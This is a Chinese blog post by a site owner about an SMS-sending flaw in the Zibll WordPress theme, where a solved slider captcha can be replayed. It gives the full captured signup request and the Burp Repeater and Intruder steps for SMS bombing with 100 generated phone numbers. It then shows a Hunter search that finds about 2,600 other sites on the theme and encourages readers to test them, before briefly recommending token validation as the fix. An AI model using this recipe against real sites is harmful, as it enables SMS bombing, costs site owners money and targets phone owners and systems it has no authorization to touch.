记猪头网站短信利用漏洞-FancyPig's blog

杂谈

深夜醒来，接收到了阿里的短信提醒

想想我这个日活5-6k人的小站也被黑产盯上了？我记得在短信注册的时候是有滑动验证的

难道说？这里面有漏洞？

漏洞复现

【零基础学渗透】工具篇——BurpSuite

1个月前

206895163

我们打开burpsuite，启用拦截功能，可以看到intercept is on

这里打开一个注册页面，输入手机号然后点击获取验证码

然后，会出现图像滑块验证，我们进行滑动，然后抓包

我们可以看到payload如下，主要的参数即为email_phone=，后面接上手机号

name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true

那么，我们来测试下，这个验证码是否能被重复利用，我们右键，选择Send to Repeater

然后看看能不能修改号码重新发包，我这里改成另一个手机号，点击send发送

居然发送成功了

然后，我看了下手机，确实收到了

那么，那些做黑产的又是如何通过我们这个漏洞制造的短信轰炸呢？

他们有很多代理池，通过频繁请求我们刚才的接口就可以完成所谓的短信轰炸……

这里，我们也简单来讲解一下，其实通过burpsuite里的暴破模式也可以间接实现

我们把刚才的包发送到入侵模块，点击Send to Intruder

我们先点击clear，清除没用的变量

然后，我们勾选手机号作为变量，点击Add $，他会在你的手机号前后都加上$

然后我们在payload中，导入任意手机号，你可以自行生成一些随机的手机号

我们随便生成了100个

然后点Load导入

然后点击start attack，短信就会被疯狂刷了，一条四分钱，猪猪直接流泪

然后就看到短信喀喀喀的被刷了……

实录

由于猪猪的主题用的是子比主题，很多同行站长也表示，实在是太难受了

看看视频里的就很惨哦

如何发现其他有此接口的同类站长

我们可以参考之前的文章

免费网络空间测绘平台奇安信Hunter——鹰图平台

1个月前

206895163

这里使用的奇安信的hunter平台，我们先获取icon

然后上传

点击确定，就可以搜索了

hunter这里只爆了5个资产

看样子图标不太行，我们再换一种搜索方式

web.body="子比"

看起来这个就很多了，可以看到有2600多条资产

然后，你就可以去测试了，看看这里面的网站是不是也存在我这样的漏洞呢？

如何修复漏洞

修复漏洞这里建议采用token验证方式，需要服务端生成token然后每次请求短信接口都需要做token校验，token如果不正确则无法发送短信！单纯的验证IP几乎是无效的策略！

相关声明 1 微信公众号：FancyPig
2 本站永久网址：https://www.iculture.cc
3 本文内容仅为技术科普，请勿用于非法用途
4 本文内容未隐讳任何个人、群体、公司。非文学作品，请勿用于阅读理解的练习
5 根据《计算机软件保护条例》第十七条，本站所有软件请仅用于学习研究用途
6 本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责

THE END